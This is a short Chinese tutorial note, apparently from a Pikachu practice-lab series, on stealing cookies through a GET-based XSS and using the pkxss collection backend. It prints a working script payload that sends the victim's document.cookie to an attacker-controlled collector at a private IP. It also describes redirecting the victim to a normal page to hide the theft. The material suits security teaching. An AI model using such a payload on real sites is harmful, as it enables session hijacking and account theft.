sec875

cookie获取和钓鱼攻击演示

  • get型XSS利用:cookie获取

  • pkxss管理后台使用介绍

    可以独立使用,把它放到某个站点下面

  • 它所有数据放到了数据库里面

  • 数据接收,用户点击以后不能是空白,得显示一些正常的页面(重定向到可信页面)

  • 测试一下构造的URL

<script>document.location= \'http://192.168.0.100/pikachu/pkxss/xcookie/cookie.php?cookie=\' + document.cookie;</script>

这里的地址就是我们cookie的接收后台,顺便把cookie给带过来。
通过JavaScript代码的DOM里面的cookie,获取了用户本地的cookie。

分类:

技术点:

相关文章:

  • 2022-01-02
  • 2021-11-30
  • 2021-11-25
  • 2021-09-27
  • 2021-08-17
  • 2021-10-19
  • 2021-04-11
  • 2021-12-19
猜你喜欢
  • 2021-08-21
  • 2021-07-14
  • 2021-11-07
  • 2021-12-13
  • 2021-09-19
  • 2021-07-15
  • 2021-09-29
相关资源
相似解决方案